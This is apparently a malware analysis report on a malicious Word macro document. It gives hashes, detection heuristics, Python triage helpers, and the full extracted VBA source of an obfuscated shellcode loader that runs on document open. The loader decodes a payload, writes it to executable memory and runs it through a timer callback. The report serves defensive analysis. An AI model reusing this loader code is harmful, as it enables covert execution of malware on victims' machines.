Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 a363fb24edce3162…

MALICIOUS

Office (OLE)

Size: 214.5 KB
Created: 2018-01-31 15:32:00
Authoring application: Microsoft Office Word
First seen: 2018-02-07
MD5: 5fb3cfffa94f1adebde4005aaa4b70fa
SHA-1: d07ef042cb4852ba5ce61fb265c790900e1ea470
SHA-256: a363fb24edce3162326238d0152b99845d0dd0be53191183aad2ceba2d168a2a
Risk Score: 110

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment

The sample contains a VBA macro whose Document_Open handler (which calls the function bedding) provides initial execution as soon as the document is opened with macros enabled. The code is heavily obfuscated: identifiers are dictionary words, every numeric constant is written as an arithmetic expression (for example 23 - 103 + 4176 for 4096), junk calls to the financial function Pmt are interleaved, and #If conditional compilation on the Win64 constant chooses between plain Long Declare statements (32-bit Office) and PtrSafe/LongPtr Declare statements (64-bit Office) for the same exports. Once the constants are folded, the logic is a conventional in-memory shellcode loader: bedding reads a string from a control on the form module dimocarpus (cynocephalidae.SelectedItem.Name), keeps its last 7844 characters and passes them to manta, which undoes a per-character offset (4 on even positions, 3 on odd) and base64-decodes the result with a lookup table built by unrestraint, yielding 5883 bytes. monism then calls NtAllocateVirtualMemory on the current process (handle -1) for 9985 bytes with MEM_COMMIT (4096) and PAGE_EXECUTE_READWRITE (64), and NtWriteVirtualMemory copies the decoded bytes into that region. Finally bedding calls CreateTimerQueueTimer with the callback address set to the allocation base plus 2064 (64-bit) or 4240 (32-bit), so the shellcode runs on a thread-pool timer thread without CreateThread or a direct call from VBA. The ClamAV detection Doc.Dropper.Agent-6436876-0 is consistent with this. The encoded payload itself lives in the form control, which is not among the carved artifacts, so what the shellcode does after it gains execution is not determined by this static pass. The document body content is benign (the only URLs are XML namespace identifiers from embedded metadata), so the malicious functionality is solely within the macro and the form data it reads.
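The constants quoted above (-1, 9985, 4096, 64) are only visible after folding the macro's arithmetic. The following Python helper is an added example, not part of the report's tooling or of the sample: it folds the integer chains, lists the obfuscated Declare aliases with their real export names, and resolves the arguments of the NtAllocateVirtualMemory call. SAMPLE_VBA is a constructed excerpt copied from lines of the macro preview later on this page; the function names and the flag tables are the example's own.

```python
"""Triage helper for arithmetic-obfuscated VBA (added example; not part of the
report's tooling or of the sample).  Folds `a - b + c` integer chains, lists the
Declare aliases with the real export names, and resolves the arguments of the
NtAllocateVirtualMemory call so MEM_COMMIT / PAGE_* values can be read off."""
import re

# Constructed excerpt: lines copied from the macro preview in this report.
SAMPLE_VBA = '''#If (62 - 27 + 365 + 83 - 56 + 273) > ((87 - 34 + 267) - (11 - 42 + 571) * 1) And ((21 - 24 + 31) - (73 - 111 + 66)) * 2 < (Win64) Then
Public Declare PtrSafe Function prelacy _
Lib "ntdll   " Alias _
"NtAllocateVirtualMemory" (copper As LongPtr, aether As LongPtr, ByVal chamaeleontidae As LongPtr, catByVal As LongPtr, ruptiliocarpon As LongPtr, ByVal argali As LongPtr) As LongPtr
#End If
Public Declare PtrSafe Function mercies _
Lib "ntdll  " Alias _
"NtWriteVirtualMemory" (ByVal alephnull As Any, ByVal alloyed As Any, ByVal bloom As Any, ByVal marker As Any, ByVal attenuated As Any) As LongPtr
Public Declare PtrSafe Function gaucherie _
Lib "Kernel32" Alias _
"CreateTimerQueueTimer" (odd As Any, ByVal rhoeadales As Any, ByVal gradeconstructed As Any, ByVal consumere As Any, ByVal naprapath As Any, ByVal aust As Any, ByVal acarina As Any) As Long
groomed = 70 - 18 - 53
anguilliformes = 120 - 101 - 19
complaint = 22 - 108 + 86
uncomely = 61 - 91 + 10015
conditionally = 23 - 103 + 4176
fanon = 43 - 29 + 50
anthropology = prelacy(ByVal groomed, _
anguilliformes, ByVal complaint, uncomely, _
ByVal conditionally, ByVal fanon)
'''

# Values for the AllocationType and Protect arguments (Win32 constants).
ALLOC_FLAGS = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x3000: "MEM_COMMIT|MEM_RESERVE"}
PROTECT = {0x04: "PAGE_READWRITE", 0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}

# An integer literal followed by one or more `+ n` / `- n` terms, not part of a
# name or a decimal number.
_ARITH = re.compile(r"(?<![\w.])\d+(?:\s*[-+]\s*\d+)+(?![\w.])")
_DECL = re.compile(r'Declare\s+(?:PtrSafe\s+)?(?:Function|Sub)\s+(\w+)\s+Lib\s+"([^"]*)"\s+Alias\s+"([^"]*)"')


def join_continuations(src: str) -> str:
    """Merge VBA line continuations (` _` at end of line) into single lines."""
    return re.sub(r"\s_\r?\n\s*", " ", src)


def fold_expr(expr: str) -> int:
    """Evaluate a chain of integer literals joined by + and - without eval()."""
    total, sign = 0, 1
    for tok in re.findall(r"\d+|[-+]", expr):
        if tok == "+":
            sign = 1
        elif tok == "-":
            sign = -1
        else:
            total += sign * int(tok)
    return total


def fold_constants(src: str) -> str:
    """Replace every `a - b + c` chain in the source with its value."""
    return _ARITH.sub(lambda m: str(fold_expr(m.group(0))), src)


def assigned_constants(folded: str) -> dict:
    """Collect `name = <integer>` assignments from folded source."""
    return {m.group(1): int(m.group(2))
            for m in re.finditer(r"^\s*(\w+)\s*=\s*(-?\d+)\s*$", folded, re.M)}


def declared_apis(src: str) -> dict:
    """Map each obfuscated alias to (library, real export name)."""
    return {m.group(1): (m.group(2).strip(), m.group(3))
            for m in _DECL.finditer(join_continuations(src))}


def resolve_call(src: str, alias: str, consts: dict) -> list:
    """Find `alias(args...)` and resolve each argument through the folded constants."""
    joined = join_continuations(src)
    m = re.search(r"\b" + re.escape(alias) + r"\s*\((.*?)\)\s*$", joined, re.M)
    if not m:
        return []
    args = [re.sub(r"^ByVal\s+", "", a.strip()) for a in m.group(1).split(",")]
    return [consts.get(a, a) for a in args]


def describe_alloc(src: str) -> dict:
    """Resolve NtAllocateVirtualMemory(ProcessHandle, *BaseAddress, ZeroBits,
    *RegionSize, AllocationType, Protect) as called through its alias."""
    folded = fold_constants(src)
    consts = assigned_constants(folded)
    apis = declared_apis(folded)
    alias = next(a for a, (_, api) in apis.items() if api == "NtAllocateVirtualMemory")
    proc, _base, _zero, size, alloc, prot = resolve_call(folded, alias, consts)
    return {
        "process": proc,  # -1 is the pseudo-handle for the current process
        "size": size,
        "alloc_type": ALLOC_FLAGS.get(alloc, hex(alloc)),
        "protect": PROTECT.get(prot, hex(prot)),
    }


if __name__ == "__main__":
    for alias, (lib, api) in declared_apis(SAMPLE_VBA).items():
        print(f"{alias:10} -> {lib}!{api}")
    print(describe_alloc(SAMPLE_VBA))
```

Run it against the full olevba output of a sample rather than the excerpt; the folding pass also turns the #If guards into plain comparisons, which makes the 32-bit/64-bit branch selection readable.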

Heuristics (5)

  • ClamAV: Doc.Dropper.Agent-6436876-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6436876-0
  • NOP-equivalent sled detected medium SC_NOP_EQUIV_SLED
    Long run of 0x40 bytes. 0x40 decodes as inc eax only when read as 32-bit code; in 64-bit mode it is a REX prefix, and inside a compound-file container a long run of one byte value is often just storage padding (0x40 is also the '@' character). Treat this as weak corroboration rather than as evidence of a raw shellcode buffer: the payload the macro decodes is carried as shifted base64 text in a form control, so this run is not that payload.
    Disassembly
    Attempted x86 opcode disassembly (32-bit decoding)
    0000740D  40                inc eax
    0000740E  40                inc eax
    0000740F  40                inc eax
    00007410  40                inc eax
    00007411  40                inc eax
    00007412  40                inc eax
    00007413  40                inc eax
    00007414  40                inc eax
    00007415  40                inc eax
    00007416  40                inc eax
    00007417  40                inc eax
    00007418  40                inc eax
    00007419  40                inc eax
    0000741A  40                inc eax
    0000741B  40                inc eax
    0000741C  40                inc eax
    0000741D  40                inc eax
    0000741E  40                inc eax
    0000741F  40                inc eax
    00007420  40                inc eax
    00007421  40                inc eax
    00007422  40                inc eax
    00007423  40                inc eax
    00007424  40                inc eax
    00007425  40                inc eax
    00007426  40                inc eax
    00007427  40                inc eax
    00007428  40                inc eax
    00007429  40                inc eax
    0000742A  40                inc eax
    0000742B  40                inc eax
    0000742C  40                inc eax
    0000742D  40                inc eax
    0000742E  40                inc eax
    0000742F  40                inc eax
    00007430  40                inc eax
    00007431  40                inc eax
    00007432  40                inc eax
    00007433  40                inc eax
    00007434  40                inc eax
    00007435  40                inc eax
    00007436  40                inc eax
    00007437  40                inc eax
    00007438  40                inc eax
    00007439  40                inc eax
    0000743A  40                inc eax
    0000743B  40                inc eax
    0000743C  40                inc eax
    0000743D  40                inc eax
    0000743E  40                inc eax
    0000743F  40                inc eax
    00007440  40                inc eax
    00007441  40                inc eax
    00007442  40                inc eax
    00007443  40                inc eax
    00007444  40                inc eax
    00007445  40                inc eax
    00007446  40                inc eax
    00007447  40                inc eax
    00007448  40                inc eax
    00007449  40                inc eax
    0000744A  40                inc eax
    0000744B  40                inc eax
    0000744C  40                inc eax
    0000744D  40                inc eax
    0000744E  40                inc eax
    0000744F  40                inc eax
    00007450  40                inc eax
    00007451  40                inc eax
    00007452  40                inc eax
    00007453  40                inc eax
    00007454  40                inc eax
    00007455  40                inc eax
    00007456  40                inc eax
    00007457  40                inc eax
    00007458  40                inc eax
    00007459  40                inc eax
    0000745A  40                inc eax
    0000745B  40                inc eax
    0000745C  40                inc eax
    0000745D  40                inc eax
    0000745E  40                inc eax
    0000745F  40                inc eax
    00007460  40                inc eax
    00007461  40                inc eax
    00007462  40                inc eax
    00007463  40                inc eax
    00007464  40                inc eax
    00007465  40                inc eax
    00007466  40                inc eax
    00007467  40                inc eax
    00007468  40                inc eax
    00007469  40                inc eax
    0000746A  40                inc eax
    0000746B  40                inc eax
    0000746C  40                inc eax
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
    chopper = "hercules"
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://ns.adobe.com/xap/1.0/ (in document text, OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/mm/ (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef# (in document text, OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
    All five are XML namespace identifiers from embedded XMP/RDF and DrawingML metadata; none is referenced by the macro and none is a network destination the sample contacts.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename     Kind        Source                                                Size
macros.bas   vba-macro   oletools.olevba.extract_macros (decoded VBA source)   11273 bytes
SHA-256: e740c6c0b23fdb8b8d88ff84528db326cb672df0d8c0ac6f6568ec828b07087a
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True


Private Sub Document_Open()
chopper = "hercules"
bedding
reclusion = 28 + 10
 Pmt 0, reclusion, 20522, 59196, 2
End Sub



Attribute VB_Name = "dimocarpus"
Attribute VB_Base = "0{3608F65F-2715-4212-85E5-29E34707BB97}{5FFAB0FC-1943-4D49-BD5C-D494ACC8D692}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False


Attribute VB_Name = "confining"
#If (62 - 27 + 365 + 83 - 56 + 273) > ((87 - 34 + 267) - (11 - 42 + 571) * 1) And ((21 - 24 + 31) - (73 - 111 + 66)) * 2 < (Win64) Then
Public Declare PtrSafe Function prelacy _
Lib "ntdll   " Alias _
"NtAllocateVirtualMemory" (copper As LongPtr, aether As LongPtr, ByVal chamaeleontidae As LongPtr, catByVal As LongPtr, ruptiliocarpon As LongPtr, ByVal argali As LongPtr) As LongPtr
#End If
Function manta(almost) As String
Dim ifla(63) As Long
Dim fossils As Long
Dim absolver As Long
Dim bromelia() As Byte
Dim exhibitionism As Long
Dim beaugregory As Long
Dim antihypertensive(63) As Long
Dim supplant As String
Dim approximative(63) As Long
Dim ungoverned(6962) As Byte
gradient = 30 - 10 + 4012
Dim annals As Long

scion = 78 - 93 + 65295
gangster = 27 - 24 + 253
introject = 71 - 76 + 69
Dim panini As Variant

bedside = 31 - 74 + 16711723
oberon = 123 - 107 + 16515056
autobiography = 101 - 36 + 257983
Dim barbiturate As Integer

hamiform = 13 - 41 + 4124
drippy = 44 - 51 + 262151
outlier = 49 - 111 + 317
flinch = 14 - 70 + 65592
cagily = 113 - 22 - 28
Dim copartner As Integer
futon = 8 - 49 + 7884
Dim mf() As Byte
mf = VBA.StrConv(almost, 120 + 8)
importer = 45 + 7
Pmt 0, importer, 25416, 25449, 7
affect = 7840 + 3
moneymaking = vbKeyShift - 12
For chordal = 0 To affect
If chordal Mod 2 = 0 Then
mf(chordal) = mf(chordal) - moneymaking
Else
mf(chordal) = mf(chordal) - (moneymaking - 1)
End If
Next chordal
boswellia = 58 + 16
Pmt 0, boswellia, 33800, 37708, 7
indulgency = unrestraint
For fossils = (16 - 8 * 2) * 1 To (80 / 2 + 23) * (7 - 6)
approximative(fossils) = admired(fossils, introject, 61)
antihypertensive(fossils) = admired(fossils, hamiform, 61)
ifla(fossils) = admired(fossils, drippy, 61)
Next fossils
salleamanger = 28 + 4
Pmt 0, salleamanger, 37442, 33315, 3
bromelia = mf
appeasable = 74 - 4 - 66
celiocentesis = 35 + 6
Pmt 0, celiocentesis, 32953, 31463, 7
expectable = 61 - 55 - 3
attendance = expectable + 1
bentley = 74 - 47 - 25
For absolver = 0 To affect
urnam = bromelia(absolver)
torah = bromelia(absolver + 2)
hold = antihypertensive(indulgency(bromelia(absolver + 1)))
namibian = approximative(indulgency(torah)) + indulgency(bromelia(absolver + expectable))
exhibitionism = ifla(indulgency(urnam)) + hold + namibian
fossils = admired(exhibitionism, bedside, 53)
ungoverned(beaugregory) = admired(fossils, flinch, 43)
fossils = admired(exhibitionism, scion, 53)
ungoverned(beaugregory + 1) = admired(fossils, gangster, 43)
ungoverned(beaugregory + bentley) = admired(exhibitionism, outlier, 53)
beaugregory = beaugregory + bentley + 1
absolver = absolver + 3
Next
manta = ungoverned
End Function




Attribute VB_Name = "dominis"
#If (2 - 59 + 457 + 82 - 79 + 297) > ((59 - 32 + 293) - (79 - 22 + 483) * 1) And Not ((47 - 59 + 40) - (75 - 44 - 3)) * 2 < (Win64) Then
Public Declare Function gaucherie _
Lib "Kernel32" Alias _
"CreateTimerQueueTimer" (soil As Any, ByVal calomel As Any, ByVal botany As Any, ByVal groundfish As Any, ByVal conserve As Any, ByVal euphoric As Any, ByVal catamaran As Any) As Long
#End If
#If (62 - 27 + 365 + 83 - 56 + 273) > ((87 - 34 + 267) - (11 - 42 + 571) * 1) And ((21 - 24 + 31) - (73 - 111 + 66)) * 2 < (Win64) Then
Public Declare PtrSafe Function gaucherie _
Lib "Kernel32" Alias _
"CreateTimerQueueTimer" (odd As Any, ByVal rhoeadales As Any, ByVal gradeconstructed As Any, ByVal consumere As Any, ByVal naprapath As Any, ByVal aust As Any, ByVal acarina As Any) As Long
#End If
Function reposit(tempera, bearings, agriculturist)
Dim accidents As Long
Dim electronically As Integer
Dim desolately As Long
Dim separately As Integer
Dim coyly As Long
Dim unapparent As String
Dim ever As Long
Dim despitefully As Variant
Dim crenate As Long
Dim inaffable As String
Dim gharrywallah As Variant
dogtooth = dogtooth
dogtooth = costa
accidents = tempera
crenate = agriculturist
dogtooth = dogtooth
coyly = bearings
feast = 55 + 55
 Pmt 0, feast, 26368, 10482, 5

foyer = Rnd(174)
desolately = 9 - 118 + 108
mercies ByVal desolately, _
accidents, coyly, _
crenate, ever
convertible = bracing + 121
End Function


Attribute VB_Name = "fixut"
#If (62 - 27 + 365 + 83 - 56 + 273) > ((87 - 34 + 267) - (11 - 42 + 571) * 1) And ((21 - 24 + 31) - (73 - 111 + 66)) * 2 < (Win64) Then
Public Declare PtrSafe Function mercies _
Lib "ntdll  " Alias _
"NtWriteVirtualMemory" (ByVal alephnull As Any, ByVal alloyed As Any, ByVal bloom As Any, ByVal marker As Any, ByVal attenuated As Any) As LongPtr
#End If
Function admired(whimsicality, antigua, nulli)
If nulli = 43 + (10 / 2 - 5) Then
admired = whimsicality \ antigua
End If
If nulli = 53 + (5 - 3) / 2 - 1 Then
admired = whimsicality And antigua
End If
If nulli = 61 + (56 / 7 - 4 * 2) Then
admired = whimsicality * antigua
End If
End Function
Function nonsense(sequent, impact, dismantle)
Dim cofactor As Long
Dim kenyapithecus As Long
Dim maggior As LongPtr
Dim antacid As LongPtr
Dim odoriferous As LongPtr
Dim grid As Long
Dim magnetism As LongPtr
Dim monrovia As LongPtr
bracing = foyer And 408
dogtooth = dogtooth
antacid = sequent
monrovia = dismantle
convertible = convertible + 275
magnetism = impact
bootless = 3 + 60
 Pmt 0, bootless, 19241, 16857, 4

dogtooth = dogtooth
maggior = 119 - 65 - 55
mercies ByVal maggior, _
antacid, magnetism, _
monrovia, odoriferous
costa = "appropinquation"
End Function

Function monism(ache)
Dim grnoematagr As Long
Dim amphibolite As Byte
Dim alteration As String
Dim cloudburst As Long
#If (119 - 44 + 325 + 42 - 114 + 372) > ((111 - 124 + 333) - (71 - 39 + 508) * 1) And ((41 - 34 + 21) - (72 - 33 - 11)) * 2 < (Win64) Then
Dim argument As Variant
Dim mindfulness As LongPtr
masaniello = 80 - 101 + 29
Dim anguilliformes As LongPtr
Dim wirehair As String
Dim caliver As Long
Dim uncomely As LongPtr
Dim belleslettres As Variant
emanate = VarPtr(mindfulness)
placoderm = nonsense(emanate, VarPtr(ache) + (62 - 20 - 34), masaniello)
#End If
#If (45 - 12 + 367 + 115 - 46 + 231) > ((44 - 56 + 332) - (126 - 53 + 467) * 1) And Not ((79 - 122 + 71) - (46 - 63 + 45)) * 2 < (Win64) Then
Dim mindfulness As Long
masaniello = 125 - 12 - 109
Dim anguilliformes As Long
Dim uncomely As Long
emanate = VarPtr(mindfulness)
placoderm = reposit(emanate, VarPtr(ache) + (91 - 2 - 81), masaniello)
#End If
groomed = 70 - 18 - 53
anguilliformes = 120 - 101 - 19
complaint = 22 - 108 + 86
uncomely = 61 - 91 + 10015
conditionally = 23 - 103 + 4176
fanon = 43 - 29 + 50
anthropology = prelacy(ByVal groomed, _
anguilliformes, ByVal complaint, uncomely, _
ByVal conditionally, ByVal fanon)
costa = dogtooth
dogtooth = "pilgarlic"
reposit anguilliformes, mindfulness, 67 - 89 + 5905
alarmism = 46 + 59
Pmt 0, alarmism, 3506, 33846, 5
monism = anguilliformes
End Function

Function bedding()
Dim gueridon As Variant
Dim nor As Variant
dimocarpus.cynocephalidae.Value = Day(#12/5/2013#)
varday = barrels = "jail"
aerobacter = allomorph
classicistic = "catchweed"
godship = heifer
dumfoundered = "omsk"

doubts = "prenticeship"
dastardly = involucre
Set metalepsis = dimocarpus.cynocephalidae.SelectedItem
adverb = 6 + 15
 Pmt 0, adverb, 36937, 59909, 5

browbeaten = metalepsis.Name
nonpsychoactive = 23 - 121 + 7942
conciliation = Right(browbeaten, nonpsychoactive)
fogged = confining.manta(conciliation)
atkins = 31 + 54
 Pmt 0, atkins, 30827, 16166, 5

leontocebus = "protrusive"
#If (76 - 18 + 342 + 45 - 33 + 288) > ((65 - 81 + 336) - (31 - 11 + 520) * 1) And ((32 - 72 + 68) - (36 - 60 + 52)) * 2 < (Win64) Then
Dim ladyinwaiting As String
Dim blastocyte As LongPtr
Dim hoax As LongPtr
Dim obediant As String
Dim stonechat As String
Dim fallaciousness As LongPtr
Dim demythologization As LongPtr
Dim render As LongPtr
abdominoscope = 8 - 42 + 2098
#ElseIf (106 - 90 + 384 + 3 - 46 + 343) > ((67 - 35 + 288) - (72 - 57 + 525) * 1) And Not ((95 - 75 + 8) - (114 - 21 - 65)) * 2 < (Win64) Then
Dim eileton As Variant
Dim hoax As Long
Dim signified As Long
Dim blastocyte As Long
Dim fallaciousness As Long
autoptical = 31 - 71 + 821
Dim demythologization As Long
Dim render As Long
abdominoscope = autoptical + 3459
#End If
diamondback = 94 - 116 + 22
thallophyte = "isotonic"
costal = 39 + 45
 Pmt 0, costal, 11568, 42979, 3

venogram = "assistive"
seafood = "mpriser"
anothers = "marduk"
styrene = 36 + 39
 Pmt 0, styrene, 33132, 35943, 4

etropus = fogged
chromatism = "broad"
blastocyte = monism(etropus)
abrasion = melancholic
efface = "macrobiotic"
Dim isospondyli As String
Dim postmeridian As Long
fallaciousness = 46 - 120 + 74
hoax = blastocyte + abdominoscope
demythologization = 30 - 82 + 201579
render = 37 - 106 + 3569
formonly = gaucherie(demythologization, _
fallaciousness, _
hoax, fallaciousness, _
fallaciousness, fallaciousness, _
fallaciousness)
dreary = 50 + 6
 Pmt 0, dreary, 38704, 58330, 6

End Function





Attribute VB_Name = "mirtans"
#If (2 - 59 + 457 + 82 - 79 + 297) > ((59 - 32 + 293) - (79 - 22 + 483) * 1) And Not ((47 - 59 + 40) - (75 - 44 - 3)) * 2 < (Win64) Then
Public Declare Function prelacy _
Lib "ntdll   " Alias _
"NtAllocateVirtualMemory" (pretrial As Long, canonist As Long, ByVal segnity As Long, narrowedByVal As Long, crowned As Long, ByVal absinthe As Long) As Long
Public Declare Function mercies _
Lib "ntdll   " Alias _
"NtWriteVirtualMemory" (ByVal plonk As Any, ByVal adamant As Any, ByVal sanctorum As Any, ByVal developer As Any, ByVal dead As Any) As Long
#End If

Function unrestraint()
Dim subjecta(255) As Byte
frostbound = 31 - 37 + 71
For i = frostbound To (57 - 78 + 112)
subjecta(frostbound) = frostbound - (127 - 53 - 9)
frostbound = frostbound + 1
If athanor > (48 - 5 + 48) Then Exit For
Next

frostbound = (86 - 20 - 18)
For i = frostbound To (65 - 82 + 75)
subjecta(frostbound) = frostbound + (78 - 125 + 51)
frostbound = frostbound + 1
If athanor > (55 - 120 + 123) Then Exit For
Next
frostbound = (68 - 47 + 76)
For i = frostbound To (13 - 99 + 209)
subjecta(frostbound) = frostbound - (77 - 115 + 109)
frostbound = frostbound + 1
If athanor > (53 - 117 + 187) Then Exit For
Next
subjecta(87 - 123 + 83) = (48 - 9 + 24)
frostbound = (68 - 31 + 6)
subjecta(frostbound) = (109 - 94 + 47)
unrestraint = subjecta
End Function
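The decoder in manta and unrestraint above, reimplemented in Python as an added example (not the sample's code and not part of the report's tooling), so that an analyst who pulls the control string out of the UserForm storage can recover the shellcode offline and locate the entry point the timer callback uses. The form control string is not carved in this report; the test input is constructed by base64-encoding known bytes and applying the macro's even/odd offset, and encode_like_sample exists only to build that input.

```python
"""Re-implementation of the sample's payload decoder (manta + unrestraint), added
as an example; not part of the sample or of the report's tooling.  Given the
string the macro reads from its UserForm control it returns the bytes that
NtWriteVirtualMemory copies into the RWX region."""
import base64

ENCODED_CHARS = 7844   # Right(browbeaten, 7844) in bedding()
PAYLOAD_LEN = 5883     # length passed to NtWriteVirtualMemory (7844 / 4 * 3)
ALLOC_SIZE = 9985      # RegionSize passed to NtAllocateVirtualMemory


def build_decode_table() -> list:
    """The 256-entry table unrestraint() fills: the standard base64 alphabet.
    (The macro's loops also write a few harmless entries just past each range.)"""
    table = [0] * 256
    for c in range(ord("A"), ord("Z") + 1):
        table[c] = c - 65          # 'A'..'Z' -> 0..25
    for c in range(ord("0"), ord("9") + 1):
        table[c] = c + 4           # '0'..'9' -> 52..61
    for c in range(ord("a"), ord("z") + 1):
        table[c] = c - 71          # 'a'..'z' -> 26..51
    table[ord("/")] = 63
    table[ord("+")] = 62
    return table


def unshift(encoded: bytes) -> bytes:
    """Undo the per-character offset: even positions carry +4 (vbKeyShift - 12), odd +3."""
    return bytes((b - (4 if i % 2 == 0 else 3)) & 0xFF for i, b in enumerate(encoded))


def decode_payload(encoded: str) -> bytes:
    """manta(): unshift, then base64 groups of four characters to three bytes.
    The macro never handles '=' padding (it decodes as 0); the real input is 7844 chars."""
    if len(encoded) % 4:
        raise ValueError("encoded length must be a multiple of 4")
    table = build_decode_table()
    raw = unshift(encoded.encode("latin-1"))
    out = bytearray()
    for i in range(0, len(raw), 4):
        v = ((table[raw[i]] << 18) | (table[raw[i + 1]] << 12)
             | (table[raw[i + 2]] << 6) | table[raw[i + 3]])
        out += bytes(((v & 0xFF0000) >> 16, (v & 0xFF00) >> 8, v & 0xFF))
    return bytes(out)


def payload_from_control_name(name: str) -> bytes:
    """bedding(): the macro decodes only the last 7844 characters of the control's Name."""
    return decode_payload(name[-ENCODED_CHARS:])


def entry_offset(bits: int) -> int:
    """Offset added to the allocation base before CreateTimerQueueTimer:
    abdominoscope = 8 - 42 + 2098 on 64-bit, (31 - 71 + 821) + 3459 on 32-bit."""
    return 2064 if bits == 64 else 4240


def encode_like_sample(payload: bytes) -> str:
    """Inverse transform, constructed only to produce test input (the sample ships no encoder)."""
    b64 = base64.b64encode(payload)
    return bytes(c + (4 if i % 2 == 0 else 3) for i, c in enumerate(b64)).decode("latin-1")


if __name__ == "__main__":
    # Constructed stand-in for the form-control string: 60 bytes, so no '=' padding.
    sample = bytes(range(60))
    assert decode_payload(encode_like_sample(sample)) == sample
    print(f"round trip ok; callback at base+{entry_offset(64)} (x64) / base+{entry_offset(32)} (x86)")
```

Feed payload_from_control_name the full Name string of the control; the last 7844 characters decode to exactly 5883 bytes, and the callback address is base plus entry_offset, which is where disassembly of the recovered buffer should start.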